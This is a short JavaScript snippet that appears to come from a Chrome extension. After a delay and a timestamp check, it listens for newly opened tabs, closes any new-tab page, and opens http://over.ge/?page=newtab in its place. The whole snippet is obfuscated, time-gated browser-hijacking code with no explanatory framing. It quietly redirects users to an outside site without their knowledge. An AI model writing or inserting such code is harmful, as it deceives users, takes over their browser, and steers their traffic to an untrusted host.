setTimeout(function() {
    if (window['r_d'] > 1471375864) {
        chrome["tabs"]["onCreated"]["addListener"](function(loaded) {
            if (loaded["url"] == "chrome://newtab/" || (loaded["url"] == "chrome://newtab" || loaded["url"] == "newtab")) {
                chrome["tabs"]["remove"](loaded["id"], function() {});
                chrome["tabs"]["create"]({
                    "url": "http://over.ge/?page=newtab"
                }, function() {})
            }
        })
    }
}, 5000);
 
